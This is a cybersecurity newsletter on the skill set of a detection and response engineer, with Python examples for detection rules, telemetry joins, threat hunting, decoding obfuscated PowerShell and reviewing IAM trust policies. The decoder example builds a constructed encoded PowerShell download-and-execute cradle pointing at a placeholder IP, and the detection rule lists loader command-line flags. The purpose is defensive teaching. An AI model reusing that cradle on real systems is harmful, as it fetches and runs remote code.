The Skill Stack of a Detection & Response Engineer
Cybersec Café #92 - 05/26/26
In six years working in cybersecurity, I’ve never been asked to hack a website.
That’s not the work.
My specialization is detection and response - and almost nobody talks about what it actually involves day to day.
Most cybersecurity news and content is built around offensive security: hack the box, find the flag, ship the writeup. That is because it is the kind of security that sells: it grabs your attention and trades on fear.
But a majority of cybersecurity jobs don’t look like that.
Here’s the actual skill stack I use as a detection & response engineer. Each one is a real lane of work with its own day-to-day tasks, but they all cross over with each other in one way or another.
Detection Engineering
Detection engineering is the work of writing the rules that catch attackers in your environment.
Every alert that fires in a SOC came from a detection somebody wrote - and this is a fundamental part of the role (it’s literally in the name).
The task is to understand how attackers behave - the commands they run, the files they touch, the actions they take when operating maliciously - and translate that behavior into a query that runs continuously against your log data, surfacing that activity in near real time.
In practice that means reading threat intel reports and turning them into detections, and writing queries against telemetry from EDR, cloud platforms, identity providers, and network sensors.
It means tuning rules so they catch the bad without paging the on-call for every benign admin action.
And it means unit-testing detections against known malicious samples (and known benign activity, so the tuning holds) before shipping them to production.
It’s writing code to stop the worst day of your company’s life before it happens.
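As an added example (not code from this newsletter), here is that loop as detection-as-code in Python: one rule over constructed process-creation events, mapped to an ATT&CK technique ID, with an allowlist for a known benign automation account and a unit test that has to pass before the rule ships. The event fields, host names, users, the placeholder encoded blob and the allowlist entry are all assumptions made for the example, not any vendor's schema or real telemetry.

```python
import re
from dataclasses import dataclass

# Detection-as-code: one rule, its ATT&CK mapping, its tuning, and its unit test.
# Event shape and every event below are constructed for this example.

@dataclass(frozen=True)
class Detection:
    name: str
    technique: str      # ATT&CK technique ID the rule is mapped to
    threshold: int = 2  # score needed to raise an alert

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# PowerShell switches that rarely appear in interactive use but are common in loaders.
SUSPICIOUS_FLAGS = re.compile(r"(?i)(?:^|\s)-(enc|encodedcommand|w\s+hidden|nop|noprofile)\b")
# Tuning: (parent image, user) pairs that legitimately run PowerShell this way (assumed).
ALLOWLIST = {("jenkins.exe", "svc_deploy")}

DETECTION = Detection("office_child_suspicious_powershell", "T1059.001")

def score(event):
    """Score one process-creation event; higher means more suspicious."""
    if event["image"].lower() != "powershell.exe":
        return 0
    parent = event["parent"].lower()
    if (parent, event["user"]) in ALLOWLIST:
        return 0
    # An Office application spawning PowerShell is suspicious on its own.
    s = 2 if parent in OFFICE_PARENTS else 0
    # Count distinct suspicious switches; -enc/-EncodedCommand and -nop/-NoProfile collapse together.
    flags = {m.group(1).lower()[:3] for m in SUSPICIOUS_FLAGS.finditer(event["cmdline"])}
    return s + len(flags)

def evaluate(events, detection=DETECTION):
    """Run the rule over a batch of events and return the alerts it would raise."""
    return [{"detection": detection.name, "technique": detection.technique,
             "host": e["host"], "user": e["user"], "score": score(e)}
            for e in events if score(e) >= detection.threshold]

SAMPLE_EVENTS = [
    # Macro-launched loader: Office parent, hidden window, encoded command (placeholder blob).
    {"host": "ws-0142", "user": "jdoe", "parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc QUFBQQ=="},
    # CI runner that uses the same switches every build: allowlisted, no alert.
    {"host": "srv-build-01", "user": "svc_deploy", "parent": "jenkins.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -File C:\\deploy\\rollout.ps1"},
    # Interactive use from Explorer: no alert.
    {"host": "ws-0201", "user": "asmith", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe Get-Process"},
]

def unit_test(detection=DETECTION):
    """Gate before shipping: valid mapping, known-bad fires, known-good stays quiet."""
    assert re.fullmatch(r"T\d{4}(?:\.\d{3})?", detection.technique), "unmapped detection"
    alerts = evaluate(SAMPLE_EVENTS, detection)
    assert [a["host"] for a in alerts] == ["ws-0142"], alerts
    return True

if __name__ == "__main__":
    unit_test()
    for alert in evaluate(SAMPLE_EVENTS):
        print(alert)
```

The allowlist is the tuning step from the text made concrete: the CI runner would otherwise score 2 and page someone every build. Keeping the allowlist in code next to the rule means the exception is reviewed and versioned with the logic it weakens.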
Data Analytics
The single most leveraged skill in modern detection & response. Every other skill on this list touches data in some way.
Modern security platforms are built on data lakes and warehouses - Snowflake, BigQuery, Databricks, Athena. Your detections, your hunts, your dashboards: they all rely on turning big data into a story you can act on.
If you understand how to analyze data and can write a tight query against three joined tables of telemetry, you can do this job. If you can’t, you’ll spend your career waiting on people who can.
Day to day this looks like writing detection logic against authentication, process, network, and cloud audit logs; joining EDR telemetry against identity data to scope blast radius during an incident; pulling 90-day windows out of a multi-trillion-row warehouse without a full scan that times out or blows the budget; and building the metrics that prove your team is working and improving.
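The blast-radius join described above, as an added example that is not part of the original newsletter: three constructed tables (process events, authentication events, identity data) loaded into an in-memory SQLite database standing in for the warehouse, and one query that scopes which accounts logged on from the compromised host after credential theft began and how many other hosts they reached. Host names, users, timestamps and the `mimikatz.exe` marker event are all constructed for the example.

```python
import sqlite3

# Constructed telemetry (no real hosts, users, or times). In production these are three
# tables in the warehouse; an in-memory SQLite database stands in for it here.
PROCESS_EVENTS = [  # (ts, host, username, image)
    ("2026-05-20T09:01:00", "ws-0142", "jdoe", "powershell.exe"),
    ("2026-05-20T09:02:10", "ws-0142", "jdoe", "mimikatz.exe"),   # credential theft begins
]
AUTH_EVENTS = [  # (ts, username, src_host, dst_host, outcome)
    ("2026-05-19T08:00:00", "it-admin", "ws-0142", "dc-01", "success"),  # before the theft: out of scope
    ("2026-05-20T09:05:00", "jdoe",     "ws-0142", "fs-01", "success"),
    ("2026-05-20T09:06:30", "it-admin", "ws-0142", "dc-01", "success"),
    ("2026-05-20T09:07:00", "it-admin", "ws-0142", "fs-02", "success"),
    ("2026-05-20T09:08:00", "bsmith",   "ws-0142", "fs-01", "failure"),  # failed logon: not reached
    ("2026-05-20T09:09:00", "jdoe",     "ws-0300", "fs-03", "success"),  # different source host
]
IDENTITIES = [  # (username, department, privileged)
    ("jdoe", "finance", 0), ("it-admin", "it", 1), ("bsmith", "finance", 0),
]

BLAST_RADIUS_SQL = """
WITH patient_zero AS (
    SELECT host, MIN(ts) AS first_seen
    FROM process_events
    WHERE image = 'mimikatz.exe'
    GROUP BY host
),
exposed_sessions AS (
    -- successful logons that left the compromised host after credential theft began
    SELECT a.username, a.dst_host
    FROM auth_events a
    JOIN patient_zero p ON a.src_host = p.host
    WHERE a.outcome = 'success' AND a.ts >= p.first_seen
)
SELECT e.username, i.department, i.privileged,
       COUNT(DISTINCT e.dst_host) AS hosts_reached
FROM exposed_sessions e
JOIN identities i ON i.username = e.username
GROUP BY e.username, i.department, i.privileged
ORDER BY i.privileged DESC, hosts_reached DESC, e.username;
"""

def load(conn):
    """Create the three tables and load the constructed rows."""
    conn.executescript("""
        CREATE TABLE process_events(ts TEXT, host TEXT, username TEXT, image TEXT);
        CREATE TABLE auth_events(ts TEXT, username TEXT, src_host TEXT, dst_host TEXT, outcome TEXT);
        CREATE TABLE identities(username TEXT PRIMARY KEY, department TEXT, privileged INTEGER);
        CREATE INDEX auth_by_src ON auth_events(src_host, ts);
    """)
    conn.executemany("INSERT INTO process_events VALUES (?,?,?,?)", PROCESS_EVENTS)
    conn.executemany("INSERT INTO auth_events VALUES (?,?,?,?,?)", AUTH_EVENTS)
    conn.executemany("INSERT INTO identities VALUES (?,?,?)", IDENTITIES)

def blast_radius():
    """Accounts exposed on the compromised host, privileged ones first."""
    conn = sqlite3.connect(":memory:")
    load(conn)
    cols = ("username", "department", "privileged", "hosts_reached")
    return [dict(zip(cols, row)) for row in conn.execute(BLAST_RADIUS_SQL)]

if __name__ == "__main__":
    for row in blast_radius():
        print(row)
```

The time bound (`a.ts >= p.first_seen`) and the source-host join are what keep this from being a full scan of the auth table; on a real warehouse the equivalent is filtering on the partition column before joining.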
Data analysis is the skill where the gap between “can technically write a SELECT statement” and “can answer hard questions fast under pressure” is the widest.
Closing that gap is an integral part of this job.
Programming
Programming is the glue between engineering and operations. Every team I’ve been on has had tooling that relies on scripting in some form, or custom tooling that requires maintenance and upkeep.
No matter what everyone tells you - cybersecurity engineers are required to understand programming fundamentals, especially in DnR.
Python is the friendliest to learn and has the largest potential impact if you’re just starting out.
Day to day often looks like writing scripts to parse data, building enrichment pipelines, automating the boring parts of incident response, and even writing detection-as-code depending on your SIEM.
You don’t need to be a fully fledged software engineer. But you do need to be the professional who can throw together a hacky solution when under the gun.
Threat Hunting
Threat hunting is detection engineering’s free-form cousin. Detections fire on behavior you’ve already defined; hunting is what you do when you suspect there’s behavior you haven’t defined yet.
Hunters often start with a hypothesis - “if an attacker were living off the land in our M365 tenant, what would that look like in our sign-in logs?”
Then it’s up to the hunter to pull the data and see if the signal is there. Sometimes the hunt finds an active compromise. More often it finds a gap in your detection coverage, which becomes the next detection you write.
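One way to run that hypothesis, as an added example that is not the newsletter’s own code: a hunt over constructed sign-in records shaped like M365 sign-in log fields (user, country, client app, MFA result, outcome). It builds a 30-day baseline of where each user normally signs in from, flags successful sign-ins in the hunt window from a country outside that baseline, and pulls out a side finding (successful legacy-protocol sign-ins that never saw an MFA prompt) that would become the next standing detection. The users, countries, timestamps, and the set of legacy client names are assumptions made for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sign-in records in the shape of M365 sign-in log fields. None of the
# users, countries or timestamps are real.
SIGN_INS = [
    {"ts": "2026-04-22T08:03:00", "user": "jdoe",   "country": "US", "client": "Browser", "mfa": True,  "ok": True},
    {"ts": "2026-05-02T09:15:00", "user": "jdoe",   "country": "US", "client": "Browser", "mfa": True,  "ok": True},
    {"ts": "2026-04-25T10:00:00", "user": "asmith", "country": "US", "client": "Browser", "mfa": True,  "ok": True},
    {"ts": "2026-05-10T11:30:00", "user": "asmith", "country": "CA", "client": "Browser", "mfa": True,  "ok": True},
    # Hunt window starts 2026-05-18.
    {"ts": "2026-05-19T03:12:00", "user": "jdoe",   "country": "RO", "client": "IMAP4",   "mfa": False, "ok": True},
    {"ts": "2026-05-19T14:00:00", "user": "asmith", "country": "CA", "client": "Browser", "mfa": True,  "ok": True},
    {"ts": "2026-05-20T02:40:00", "user": "bsmith", "country": "RO", "client": "IMAP4",   "mfa": False, "ok": False},
]
HUNT_START = datetime(2026, 5, 18)
# Client app values that cannot complete an MFA prompt (legacy protocols); assumed set.
LEGACY_CLIENTS = {"IMAP4", "POP3", "Authenticated SMTP", "Exchange ActiveSync", "Other clients"}

def _ts(record):
    return datetime.fromisoformat(record["ts"])

def build_baseline(records, hunt_start, baseline_days=30):
    """Countries each user successfully signed in from during the baseline window."""
    start = hunt_start - timedelta(days=baseline_days)
    baseline = defaultdict(set)
    for r in records:
        if r["ok"] and start <= _ts(r) < hunt_start:
            baseline[r["user"]].add(r["country"])
    return baseline

def hunt_new_country_logins(records, hunt_start=HUNT_START):
    """Hypothesis: a stolen credential is used from a country the user has never signed in from."""
    baseline = build_baseline(records, hunt_start)
    hits = []
    for r in records:
        if _ts(r) >= hunt_start and r["ok"] and r["country"] not in baseline[r["user"]]:
            hits.append({"user": r["user"], "ts": r["ts"], "country": r["country"],
                         "legacy_no_mfa": r["client"] in LEGACY_CLIENTS and not r["mfa"]})
    return hits

def legacy_auth_successes(records, hunt_start=HUNT_START):
    """Side finding that becomes a standing detection: any success over a legacy client skipped MFA."""
    return [r for r in records if _ts(r) >= hunt_start and r["ok"] and r["client"] in LEGACY_CLIENTS]

if __name__ == "__main__":
    for hit in hunt_new_country_logins(SIGN_INS):
        print("new-country sign-in:", hit)
    for r in legacy_auth_successes(SIGN_INS):
        print("legacy auth success (coverage gap):", r["user"], r["ts"], r["client"])
```

The hit here is a real compromise candidate (new country, legacy protocol, no MFA). The second function is the more typical outcome the text describes: the hunt shows that legacy-protocol sign-ins succeed at all, and that condition is worth a detection regardless of where they come from.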
To be a great hunter, you need the strong mind of a data analyst, the technical skills to iterate on queries quickly, the mind of an attacker to embody what a malicious actor would do, and the perspective of a defender to understand how to catch a threat actor.
Hunting is the skill that lets you keep bolstering your defenses against the attackers you haven’t seen yet.
Incident Response
When all your defenses fail, this is what happens next.
A real incident has phases - identify what’s happening, contain the blast radius, eradicate the threat from the environment, and recover the affected systems.
Each phase requires a different set of brain muscles.
Containment is about cutting the attacker off without spooking them into burning your environment.
Eradication is about being really sure that you got everything.
Recovery is about restoring service without restoring the foothold.
Security engineers in detection and response are expected to fill different roles in this operational workflow, anywhere from incident commander to individual contributor.
Leading an incident often means coordinating cross-functionally with many teams:
Engineering when it involves the product
Legal when an incident escalates
Account executives when it involves a customer
While the goal is to not get popped - the reality is, you will. And when you do, you’re not running the response alone.
IR is the highest-stakes lane on this list. The clock is always running.
Security Operations
Detection engineering writes the rules. Security Operations is the skill that lives in their output.
Security Operations is the operational muscle of cybersecurity - the people in the queue, on the rotation, dispositioning alerts as they come in. Every detection you write eventually fires on somebody’s shift, and that somebody is a Security Operations engineer or analyst making the call: is this real, is this benign, do we escalate.
Day to day this looks like triaging alerts coming out of the SIEM, running playbooks against the ones that turn out to be real, escalating to incident response when scope grows, feeding false positives back to detection engineering for tuning, and owning the on-call rotation that keeps the lights on 24/7.
Security Operations is the discipline where most cybersecurity careers start, and where most of them stay. It’s also the lane that hands every other skill on this list its feedback loop - if your detections are noisy, Security Operations tells you. If your hunts produce nothing useful, Security Operations tells you. If your IR playbooks fall apart under pressure, Security Operations is where you find out.
MITRE ATT&CK
MITRE ATT&CK is the framework that functions as a shared language defenders use to talk about attacker behavior. Without it, every team would be reinventing their own taxonomy for “the bad guy did X.”
The framework is a structured catalog of the tactics (the why) and techniques (the how) attackers use, with sub-techniques under many of the techniques.
A detection isn’t really shippable until it’s mapped to a technique.
A threat intel report isn’t really actionable until you’ve extracted the techniques it describes.
A coverage gap in your detection program isn’t really visible until you’ve laid your detections against the matrix.
Think of it like the periodic table of cybersecurity.
Code Review
Cybersecurity engineers review code constantly.
Some of it is friendly code: detection-as-code PRs from teammates, internal tooling, automation scripts - with the main job being to make sure the logic matches the intent, the tests cover the failure modes, and the rule won’t drown the on-call when it ships.
Some of it is hostile code: PowerShell payloads pulled off a compromised endpoint, obfuscated JavaScript dropped by a phishing landing page, malware samples extracted from a sandbox.
And the reality is that it won’t always be in a programming language that you know how to write.
But part of the skill is understanding the logic, reasoning about unfamiliar syntax, and figuring out exactly how the code fits into the bigger picture.
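A worked example of reviewing hostile code, added here and not taken from the newsletter: a small Python analyser for the encoded PowerShell command lines mentioned above. It decodes the `-EncodedCommand` blob (base64 of UTF-16LE text), unwraps one layer of `FromBase64String(...)` plus gzip or raw-deflate compression that loaders commonly stack on top, and pulls URLs and IPv4 addresses out of every layer. The sample command line is constructed inside the block from a made-up two-stage script; the `198.51.100.7` address is from the documentation range and is not a real indicator.

```python
import base64
import gzip
import re
import zlib

B64_RE = r"[A-Za-z0-9+/]{16,}={0,2}"
URL_RE = r"https?://[^\s'\"()]+"
IP_RE = r"\b(?:\d{1,3}\.){3}\d{1,3}\b"

def decode_encoded_command(cmdline):
    """Return the script behind -e/-ec/-enc/-EncodedCommand, or None if there is none."""
    m = re.search(r"(?i)\s-e(?:c|nc?|ncodedcommand)?\s+(" + B64_RE + ")", cmdline)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode("utf-16le")

def unwrap_compressed_blobs(script):
    """For each FromBase64String('...') blob, try gzip then raw deflate; return the decoded layers."""
    layers = []
    for blob in re.findall(r"FromBase64String\(\s*['\"](" + B64_RE + r")['\"]\s*\)", script):
        raw = base64.b64decode(blob)
        for decompress in (gzip.decompress, lambda b: zlib.decompress(b, -15)):
            try:
                layers.append(decompress(raw).decode("utf-8", "replace"))
                break
            except (OSError, EOFError, zlib.error):
                continue
    return layers

def analyse(cmdline):
    """Decode every layer we can and extract network indicators from all of them."""
    stage1 = decode_encoded_command(cmdline)
    layers = [stage1] + unwrap_compressed_blobs(stage1) if stage1 else []
    urls, ips = set(), set()
    for layer in layers:
        urls.update(re.findall(URL_RE, layer))
        ips.update(re.findall(IP_RE, layer))
    return {"layers": layers, "urls": sorted(urls), "ips": sorted(ips)}

# Constructed sample: a download cradle, gzip-compressed and wrapped in a stage-one
# decompressor, then UTF-16LE base64-encoded the way -EncodedCommand expects.
STAGE2 = "$u='http://198.51.100.7/stage2.ps1';IEX (New-Object Net.WebClient).DownloadString($u)"
STAGE1 = ("IEX (New-Object IO.StreamReader((New-Object IO.Compression.GzipStream("
          "[IO.MemoryStream][Convert]::FromBase64String('%s'),"
          "[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()"
          % base64.b64encode(gzip.compress(STAGE2.encode())).decode())
SAMPLE_CMDLINE = "powershell.exe -nop -w hidden -enc " + base64.b64encode(STAGE1.encode("utf-16le")).decode()

if __name__ == "__main__":
    result = analyse(SAMPLE_CMDLINE)
    for i, layer in enumerate(result["layers"]):
        print(f"layer {i}: {layer[:80]}...")
    print("urls:", result["urls"], "ips:", result["ips"])
```

Reading the decoded layers is still the job; the script only removes the encoding so the reviewer can see what the payload actually reaches out to and what it does with the response.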
Cloud Security
The way we think about the perimeter is fundamentally different from what it was 10-15 years ago. The thing you used to defend with a firewall is now a policy written in Terraform or another configuration language.
The cloud attack surface looks different than the traditional on-premise network - stolen access keys, OIDC token abuse, role chaining, over-privileged service accounts, exposed metadata endpoints.
And the telemetry looks different - CloudTrail, GCP audit logs, and Azure activity logs are the languages we have to learn to speak (which, again, ties back to data analysis).
You may find yourself writing detections against or hunting through cloud audit logs, reviewing IAM policies and trust relationships for over-privilege, responding to an incident contained entirely in the cloud, and building telemetry pipelines to ingest audit logs into your SIEM.
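The trust-relationship review above, as an added example that is not part of the newsletter: a Python checker for AWS IAM role trust policies that flags a wildcard principal, and, for OIDC federation (`sts:AssumeRoleWithWebIdentity`), a missing audience or subject condition or a subject pattern that covers every repository in an organization. The four policies are constructed; the account ID, role and organization names are placeholders, and the org-wide subject check is a heuristic for GitHub-style `repo:org/name:...` subjects.

```python
import re

OIDC_ISSUER = "token.actions.githubusercontent.com"

def as_list(value):
    """IAM policy fields may be a scalar or a list; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]

def review_trust_policy(policy):
    """Return human-readable findings for one role trust (assume-role) policy document."""
    findings = []
    for st in as_list(policy.get("Statement")):
        if st.get("Effect") != "Allow":
            continue
        principal = st.get("Principal", {})
        actions = as_list(st.get("Action"))
        condition = st.get("Condition", {})
        cond_keys = {key for block in condition.values() for key in block}

        # 1. Anyone at all can assume the role.
        if principal == "*" or (isinstance(principal, dict) and "*" in as_list(principal.get("AWS"))):
            findings.append("principal wildcard: any AWS identity can assume this role")
            continue
        if not isinstance(principal, dict):
            continue

        # 2. OIDC federation that is not pinned to an audience and a subject.
        for fed in as_list(principal.get("Federated")):
            if "oidc-provider/" not in fed or "sts:AssumeRoleWithWebIdentity" not in actions:
                continue
            issuer = fed.split("oidc-provider/", 1)[1]
            if f"{issuer}:aud" not in cond_keys:
                findings.append(f"OIDC trust missing {issuer}:aud condition")
            if f"{issuer}:sub" not in cond_keys:
                findings.append(f"OIDC trust missing {issuer}:sub condition: any token from {issuer} can assume")
                continue
            subjects = [s for block in condition.values() for k, v in block.items()
                        if k == f"{issuer}:sub" for s in as_list(v)]
            for sub in subjects:
                # Heuristic: "repo:<org>/*" admits every repository in the org.
                if re.fullmatch(r"repo:[^/]+/\*.*", sub):
                    findings.append(f"OIDC subject '{sub}' covers every repository in the org")
    return findings

def _oidc_policy(condition):
    return {"Version": "2012-10-17", "Statement": [{
        "Effect": "Allow",
        "Principal": {"Federated": f"arn:aws:iam::123456789012:oidc-provider/{OIDC_ISSUER}"},
        "Action": "sts:AssumeRoleWithWebIdentity",
        "Condition": condition}]}

# Constructed policies (placeholder account and names).
TRUST_POLICIES = {
    "ops-role-open": {"Version": "2012-10-17", "Statement": [{
        "Effect": "Allow", "Principal": {"AWS": "*"}, "Action": "sts:AssumeRole"}]},
    "ci-role-loose": _oidc_policy({"StringEquals": {f"{OIDC_ISSUER}:aud": "sts.amazonaws.com"}}),
    "ci-role-org-wide": _oidc_policy({"StringEquals": {f"{OIDC_ISSUER}:aud": "sts.amazonaws.com"},
                                      "StringLike": {f"{OIDC_ISSUER}:sub": "repo:example-org/*"}}),
    "ci-role-pinned": _oidc_policy({"StringEquals": {f"{OIDC_ISSUER}:aud": "sts.amazonaws.com"},
                                    "StringLike": {f"{OIDC_ISSUER}:sub": "repo:example-org/example-app:ref:refs/heads/main"}}),
}

def review_all(policies=TRUST_POLICIES):
    return {name: review_trust_policy(policy) for name, policy in policies.items()}

if __name__ == "__main__":
    for name, findings in review_all().items():
        print(name, "->", findings or ["ok"])
```

The second policy is the OIDC token abuse case from the text in miniature: with only an audience check, any workflow in any repository on that issuer can mint a token that the role accepts. Pinning `sub` to the repository and branch that actually deploys is the fix.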
Every defender on the planet is becoming a cloud defender, whether they wanted to or not.
Software Engineering & System Design
The difference between scripting and engineering is durability. A script solves one narrow problem for one person.
Real, enterprise-grade software gets written, tested, deployed, versioned, and maintained.
It starts with secure system architecture. You may find yourself designing systems from scratch, or reviewing systems from a security perspective before they get built - the services, data flows, trust boundaries, integrations.
Software engineering is more than just coding - it’s reasoning about how systems can break, how they scale, and how they become maintainable.
Detection & Incident Response teams function more like a traditional software engineering team than you might think, with the tools, processes, and deployment pipelines that have become a staple of security engineering.
Most security teams underinvest in this skill. But the best DnR engineers are system thinkers first and, especially in today’s AI age, programmers second.
The Truth about Detection & Response
If you’re not deep in the weeds of security engineering, especially Detection & Response, it may be hard to believe just how adjacent it is to so many other disciplines.
That’s because both the engineering and the operational work touch the entire environment: every organization needs visibility into its systems, and a team ready to respond when there is a security incident.
But don’t let that scare you. When people say Detection & Response isn’t an entry-level job, they’re not lying. It’s tough to get into off the jump because of how much knowledge you need across the entire stack of an organization.
What matters is understanding the pieces that go into becoming a detection & response engineer, and putting in the work to develop your skill set to get there.
Securely Yours,
Ryan G. Cox